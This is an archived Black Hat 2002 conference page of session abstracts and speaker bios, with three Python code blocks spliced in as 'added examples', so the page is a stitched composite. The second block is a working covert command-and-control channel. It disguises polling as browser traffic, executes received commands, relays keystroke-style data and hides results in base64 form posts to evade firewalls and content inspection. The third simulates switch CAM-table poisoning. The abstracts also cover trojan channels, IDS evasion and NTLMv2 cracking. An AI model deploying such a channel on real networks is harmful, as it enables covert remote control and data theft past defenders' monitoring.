Tony Sager is the Chief of the System and Network Attack Center (SNAC/C4), part of the Information Assurance Directorate of the National Security Agency (NSA). During his 24 years with NSA, he has served in a variety of technical and management positions, spanning computer security, cryptography, software analysis, and network security. His Center produces the NSA Security Recommendation Guides to Windows 2000, the first of several security products they have released to the public. Tony is also actively involved with a number of community-wide public activities in network security. He has degrees in Mathematics and Computer Science, and dabbles as a PC hobbyist, struggling to protect his home LAN from bad guys and three adventurous adolescent users.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


How to Stay Up-To-Date On Security Patches
Eric Schultze, Senior Technologist , Security Strategies Group, Microsoft
[ General Track ]

New security patches are released every week. How can you stay informed about each of the patches and their applicable platforms? What is Microsoft doing to make it easier to identify and deploy hotfixes? This session will discuss the various methods to stay aware of what patches are available for your various platforms and some of the tools you can use to help deploy these patches across your enterprise.

We will discuss the current tools that Microsoft makes available to deploy security hotfixes, as well as some cool new ideas to deploy patches using Active Directory and/or batch scripting. We'll also discuss the new concepts and tools coming out of Redmond to help support ongoing security patch management.

A good portion of this discussion will focus on version 2 of the XML-based security hotfix database and the tools available to parse this file. Third party vendors, tool developers, and yes, even Harlan Carvey and his Perl scripts will be able to leverage the new XML schema to build tools to automatically assess, download, and apply patches to Microsoft systems. Stop the madness, apply the patches, be secure.
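To show the kind of assessment tool the paragraph has in mind, here is an added example that is not Microsoft's or Schultze's code and does not reproduce the real hotfix database schema: the element and attribute names, the bulletin and KB identifiers, and the registry-style key names are all constructed for this example. What it demonstrates is the part such tools get wrong most often, namely that a missing patch is not simply "listed minus installed", because an installed patch can supersede an older one.

```python
import xml.etree.ElementTree as ET

# Constructed, simplified hotfix database. The element and attribute names
# are this example's own (not Microsoft's published schema) and the
# identifiers are placeholders.
SAMPLE_DB = """<?xml version="1.0"?>
<HotfixDB version="2">
  <Product name="Windows 2000" sp="2">
    <Patch bulletin="DEMO-001" kb="KBDEMO1"/>
    <Patch bulletin="DEMO-002" kb="KBDEMO2"/>
    <Patch bulletin="DEMO-005" kb="KBDEMO5" supersedes="KBDEMO1"/>
  </Product>
  <Product name="Windows 2000" sp="3">
    <Patch bulletin="DEMO-005" kb="KBDEMO5"/>
  </Product>
  <Product name="Windows XP" sp="0">
    <Patch bulletin="DEMO-003" kb="KBDEMO3"/>
  </Product>
</HotfixDB>
"""

# Constructed stand-in for an export of the hotfix registry keys of one host
# (NT/2000 record installed hotfixes as subkeys named after the Q/KB number).
SAMPLE_HOST_KEYS = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\KBDEMO5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\KBDEMO9
"""


def load_db(xml_text):
    """Parse the database into {(product, service pack): [patch records]}."""
    db = {}
    for prod in ET.fromstring(xml_text).findall("Product"):
        key = (prod.get("name"), prod.get("sp"))
        db[key] = [
            {
                "bulletin": p.get("bulletin"),
                "kb": p.get("kb"),
                "supersedes": [s for s in p.get("supersedes", "").split(",") if s],
            }
            for p in prod.findall("Patch")
        ]
    return db


def installed_from_hotfix_keys(text):
    """Take the last path component of each Hotfix\\... key as an installed id."""
    return {line.rsplit("\\", 1)[1] for line in text.splitlines() if "\\Hotfix\\" in line}


def missing_patches(db, product, sp, installed):
    """Bulletins required on this host that are neither installed nor made
    redundant by an installed patch that supersedes them (one level deep,
    which is what the sample data expresses)."""
    applicable = db.get((product, sp), [])
    installed = set(installed)
    covered = set(installed)
    for p in applicable:
        if p["kb"] in installed:
            covered.update(p["supersedes"])
    return sorted(p["bulletin"] for p in applicable if p["kb"] not in covered)


if __name__ == "__main__":
    db = load_db(SAMPLE_DB)
    have = installed_from_hotfix_keys(SAMPLE_HOST_KEYS)
    print(missing_patches(db, "Windows 2000", "2", have))  # ['DEMO-002']
```

Without the supersedence step the host above would be flagged for DEMO-001 as well, and an automated "apply everything missing" loop would try to install an old hotfix over a newer one. The same logic is what a deployment script driven from Active Directory or batch files needs before it decides what to push to each machine.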

Eric Schultze is a Senior Technologist in the Security Strategies group at Microsoft and has memorized every security hotfix ever released by Microsoft in a security bulletin. In his spare time, he maintains the Microsoft hotfix XML database and designs new features for HFNetChk. Eric is a former Founder of Foundstone, co-creator of the Extreme\Ultimate Hacking training classes, and technical editor for the Hacking Exposed: Windows 2000 book. A fashion victim of his former employer, Eric will be sporting his Foundstone action-figure attire during the conference.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


Deploying and Securing Microsoft Internet Security and Acceleration Server
Thomas Shinder, MD, Moderator,
Jim Harrison, Microsoft Tester , Subscription Products Group, Microsoft
[ MS Apps Track ]

Microsoft's Internet Security and Acceleration Server (ISA Server) is quickly becoming a popular choice for system administrators looking for Enterprise class firewall solutions.

Not only does ISA provide a competitive firewall product, but it supports advanced filtering capabilities, server publishing, and Internet content caching. It also takes time and discipline to master.

This session will lead you through the proper design and deployment of ISA Server in both Enterprise and Stand-Alone environments, and will discuss the tricks and traps of proper firewall rule design, client configuration, and troubleshooting.

Once deployed, ISA Server must also be properly maintained. We will discuss the various ISA Server log files and Windows event log entries, what they mean, and how to properly interpret and discern the information therein.

Thomas W Shinder, M.D. is a 10-year computing industry veteran who's worked as a trainer, writer and a consultant for Fortune 500 companies including FINA Oil, Lucent Technologies and Sealand Container Corporation. Tom has written or contributed to over 20 Windows 2000 related books and was a Series Editor of the Syngress/Osborne Series of Windows 2000 Certification Study Guides. He is also the author of the best selling book "Configuring ISA Server 2000: Building Firewalls with Windows 2000".

In addition to his book work, Tom stays busy as the editor of the Win2k Insider newsletter, editor of the Sunbelt Software WinXP News newsletter, and is a regular contributor on networking and network security infrastructure topics to

Tom is one of the primary perpetrators of and he wears the hats of content editor, contributor and moderator for the World's leading site on ISA Server 2000, When not writing, he spends time consulting on ISA Server and security projects with small and medium sized businesses and government entities.

Jim Harrison, a Microsoft tester with the Subscription Products Group, was introduced to ISA Server when he joined the NetDocs group as an infrastructure tester. After reviewing the Microsoft ISA Server deployment and infrastructure topology, he went on to design the ISA deployment and setup for NetDocs, and is now an avid ISA Server supporter and systems implementer.

As a known authority on ISA Server's vast enterprise configuration options, Jim consults for various Microsoft groups on proper deployment and installation of the product. Currently, Jim is engaged in different test projects designing integrated solutions for Microsoft's intra- and extranets.

Jim is also a regular contributor and technical writer for the most popular ISA Server information portal in existence,

[ Their Presentation! ] [ See It! ] [ Hear It! ]


Bi-directional Communications in a Heavily Protected Environment
Roelof Temmingh,Technical Director & Founding Member, SensePost
Haroon Meer, Technical Security Specialist, SensePost
[ General Track ]

The paper concentrates on setting up a reliable bi-directional data stream in a non-conducive environment. A practical application for such a data stream is that of a Trojan. The presentation however does not concentrate on functionality of such a Trojan. The talk focuses on methods to set up bi-directional communication in the presence of stateful firewalls, NAT devices, non-routed networks, content level checking (such as anti-virus devices), authentication proxies and caches, using (amongst other techniques) encapsulation within existing protocols.

The objective of the presentation is to stimulate the minds of the attendees to further explore different applications of the technique and to find ways to counter such activities while not discussing the applications of the techniques in depth. The presentation provides a practical demonstration; keystrokes are transmitted from a heavily protected network to a controller on the Internet, and a file transfer implementation is demonstrated. Source code and binaries for above demonstration will be made available.
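The exchange the talk describes, as an added example that is not SensePost's code: the agent inside the protected network never listens and never opens an inbound connection; it makes ordinary outbound HTTP requests, which is all a stateful firewall, NAT device or authenticating proxy is built to allow. Commands ride back inside what looks like a web page and results go out as a form post. The page layout, the form field name, the fake browser User-Agent and the three command handlers are this example's own choices, and both ends run in one process on the loopback interface so the exchange can be observed offline.

```python
import base64
import json
import queue
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import Request, urlopen

UA = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"  # look like a browser


def _b64(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).decode()


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text)


class ChannelHandler(BaseHTTPRequestHandler):
    """Controller side (Internet). Answers polls with the next queued command
    and collects results; to a proxy both look like ordinary web traffic."""

    def log_message(self, *args):
        pass

    def do_GET(self):
        try:
            cmd = self.server.outbound.get_nowait()
        except queue.Empty:
            cmd = ""
        # The command rides inside an HTML comment of an otherwise boring page.
        body = ("<html><body><p>news</p><!-- %s --></body></html>" % _b64(cmd.encode())).encode()
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        # The result arrives as a form field "q=<base64 json>", like a search box.
        length = int(self.headers.get("Content-Length", "0"))
        form = self.rfile.read(length).decode()
        self.server.results.append(json.loads(_unb64(form.split("q=", 1)[1])))
        self.send_response(200)
        self.send_header("Content-Length", "2")
        self.end_headers()
        self.wfile.write(b"ok")


class Controller(HTTPServer):
    def __init__(self, addr=("127.0.0.1", 0)):
        super().__init__(addr, ChannelHandler)
        self.outbound = queue.Queue()
        self.results = []


def agent_poll(base_url, handlers):
    """Agent side (inside the protected network): one outbound GET to fetch a
    command, one outbound POST to return its result. Returns the command it
    ran, or None when the controller had nothing queued."""
    req = Request(base_url + "/news.html", headers={"User-Agent": UA})
    with urlopen(req, timeout=5) as resp:
        page = resp.read().decode()
    blob = page.split("<!-- ", 1)[1].split(" -->", 1)[0]
    if not blob:
        return None
    cmd = _unb64(blob).decode()
    name, _, arg = cmd.partition(" ")
    out = handlers.get(name, lambda a: "unknown command")(arg)
    form = ("q=" + _b64(json.dumps({"cmd": cmd, "out": out}).encode())).encode()
    post = Request(base_url + "/search", data=form,
                   headers={"User-Agent": UA, "Content-Type": "application/x-www-form-urlencoded"})
    with urlopen(post, timeout=5) as resp:
        resp.read()
    return cmd


def run_channel(commands):
    """Drive a complete exchange in-process; return what the controller received."""
    ctrl = Controller()
    threading.Thread(target=ctrl.serve_forever, daemon=True).start()
    for c in commands:
        ctrl.outbound.put(c)
    base_url = "http://%s:%d" % ctrl.server_address
    # Stand-ins for the talk's keystroke relay and file transfer.
    handlers = {"echo": lambda a: a, "upper": lambda a: a.upper(), "keys": lambda a: "typed: " + a}
    while agent_poll(base_url, handlers) is not None:
        pass
    ctrl.shutdown()
    ctrl.server_close()
    return ctrl.results


if __name__ == "__main__":
    print(run_channel(["echo hello", "keys s3cret"]))
```

Because the agent only ever initiates connections, the stateful firewall sees a client browsing, NAT needs no inbound mapping, and a proxy that demands credentials can be satisfied by sending the same ones the user's browser sends. Content-level inspection is the layer that can still bite, which is why the payload is base64 inside an innocuous page rather than raw bytes; the countermeasure side of the talk starts from exactly that observation, looking for polling patterns and for "pages" that never change except in a comment.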

Roelof Temmingh is the technical director and a founding member of SensePost. After obtaining his degree in electronic engineering in 1995, he started his career working as a programmer at a cutting edge development company specializing in data encryption devices. Having established SensePost along with some of South Africa's leading IT security minds, Roelof is currently involved in the coding of proof of concept code, and the practical realization of complex security concepts. He has a captivating interest in Trojans: he published an article on HNN (then L0pht, now part of @stake) in 1998 entitled "Worst Nightmares Come Alive" that featured in Bruce Schneier's CryptoGram, and made headlines on SlashDot (a year after it was published). Roelof has been a speaker at the 2001 "Summercon" conference in Amsterdam.

Haroon Meer joined SensePost as a Technical Security Specialist after over 7 years in the Networking / Security industry. He has a wide background in security & networking from writing code to administration of large Campus networks. He is currently heavily involved in the development of additional security tools and proof of concept code.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


Jonathan Wilkins, Security Researcher,
[ Network Track ]

Taranis redirects traffic on switch hardware by sending spoofed ethernet traffic. This is not the same as an ARP poisoning attack as it affects only the switch, and doesn't rely on ARP packets. Plus, it is virtually invisible because the packets it sends aren't seen on any other port on the switch. Evading detection by an IDS that may be listening on a monitoring port is as simple as changing the type of packet that is sent by the packet spoofing thread.

I will cover the ethernet layer in depth and then go on to explain how current switch hardware works. I'll then give a demonstration of Taranis and explain how the attack can be extended for arbitrary protocols. I'll finish up with defences and directions for future research.
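An added model of the switch behaviour the attack relies on (this is not Taranis's code, and it sends nothing on the wire): a transparent bridge learns the port for each source MAC it sees, so a frame whose source address is the victim's, arriving on the attacker's port, moves the victim's entry to that port and the switch then delivers the victim's traffic there. The MAC addresses are from the documentation range, the port numbers and the EtherType on the spoofed frame are arbitrary, and the learning-switch class is a deliberately minimal model (no ageing, no VLANs, no port security).

```python
import struct


def mac_bytes(mac):
    return bytes(int(x, 16) for x in mac.split(":"))


def mac_str(b):
    return ":".join("%02x" % x for x in b)


def build_frame(dst_mac, src_mac, ethertype, payload):
    """Raw Ethernet II frame. With a spoofed src_mac this is what the switch
    learns from; EtherType and payload are free to vary, which is what makes
    a signature on any one packet type useless to an IDS on a monitor port."""
    return mac_bytes(dst_mac) + mac_bytes(src_mac) + struct.pack("!H", ethertype) + payload


def parse_frame(frame):
    return mac_str(frame[0:6]), mac_str(frame[6:12]), struct.unpack("!H", frame[12:14])[0], frame[14:]


class LearningSwitch:
    """Minimal model of transparent bridging: source MAC -> ingress port.
    No ageing, no VLANs, no port security (all of which are assumptions)."""

    def __init__(self):
        self.cam = {}
        self.moves = []  # (mac, old_port, new_port): what a watchful admin alerts on

    def receive(self, port, frame):
        """Learn from the source address; return the port the frame would be
        forwarded to ("flood" if the destination is unknown)."""
        dst, src, _, _ = parse_frame(frame)
        old = self.cam.get(src)
        if old is not None and old != port:
            self.moves.append((src, old, port))
        self.cam[src] = port
        return self.cam.get(dst, "flood")


def redirect_demo():
    """Constructed scenario: victim on port 1, gateway on port 2, attacker on
    port 3. Returns where the gateway's traffic to the victim goes before and
    after the spoofed frame, plus the CAM-table moves that occurred."""
    sw = LearningSwitch()
    victim, gateway, attacker = "00:00:5e:00:53:01", "00:00:5e:00:53:fe", "00:00:5e:00:53:66"
    # Normal traffic: the switch learns the victim on port 1 and the gateway on port 2.
    sw.receive(1, build_frame(gateway, victim, 0x0800, b"GET / HTTP/1.0"))
    sw.receive(2, build_frame(victim, gateway, 0x0800, b"HTTP/1.0 200 OK"))
    before = sw.receive(2, build_frame(victim, gateway, 0x0800, b"more data"))
    # The attacker first lets the switch learn its own MAC on port 3, then sends
    # a frame whose *source* is the victim's MAC and whose destination is its
    # own. The switch relearns the victim on port 3. Because the destination
    # is already known on port 3 the frame is never flooded, so no other port
    # (including a monitor port) sees it; no ARP is involved at any point.
    sw.receive(3, build_frame(gateway, attacker, 0x0800, b"ordinary request"))
    sw.receive(3, build_frame(attacker, victim, 0x88B5, b"\x00" * 46))
    after = sw.receive(2, build_frame(victim, gateway, 0x0800, b"session data"))
    return before, after, sw.moves


if __name__ == "__main__":
    print(redirect_demo())  # (1, 3, [('00:00:5e:00:53:01', 1, 3)])
```

The victim's own next frame moves its entry back to port 1, which is why the real attack has a thread that keeps resending the spoofed frame; the flapping that this produces is also the one thing the switch itself can notice. The model's `moves` list stands in for the port-security or MAC-move notification that is the practical defence, since the frame that does the damage is never delivered to any other port.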

To download taranis, go to:

Jonathan Wilkins has been active in the security community since the early 1990's. He worked for Secure Networks Inc developing Ballista (now Network Associates' CyberCop Scanner) and at Zero Knowledge on the Freedom privacy suite. He has released several security tools including NTCrack and has been publishing security research since 1996.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


Cracking NTLMv2 Authentication
Hidenobu Seki
[ Tools of the Trade Track ]

NTLMv2 is one of the Microsoft Windows authentication mechanisms used when users attempt to log into a remote system through network connections. It uses the challenge/response model in order to avoid sending passwords onto the network in plain text. The previous versions of the authentication mechanism, LM and NTLM version 1, are known to be vulnerable. So Microsoft introduced NTLM version 2 and claims that it "significantly improves" the authentication mechanism.

In this presentation, I will start with a brief introduction to the LM authentication mechanism. Then I will discuss the encryption algorithm used by NTLM version 2. Finally I will focus on how to capture SMB traffic and how to extract the authentication data needed to crack NTLMv2. This presentation will let you realize that the security of your system really depends on the complexity of your password, not on the "improved" algorithm of NTLMv2.

We have developed a system to crack NTLMv2 passwords using a cluster of 16 PCs. At the end of this presentation, I will give a demonstration based on this system.

Hidenobu Seki, aka Urity, works as a network security specialist at He has a deep interest in the authentication system of MS Windows. SecurityFriday performs research on local computer network security. SecurityFriday's members are very knowledgeable in the areas of network security at the Ethernet layer and in Windows SMB networking.

[ Their Presentation! ] [ See It! ] [ Hear It! ]


(c) 1996-2002 Black Hat, Inc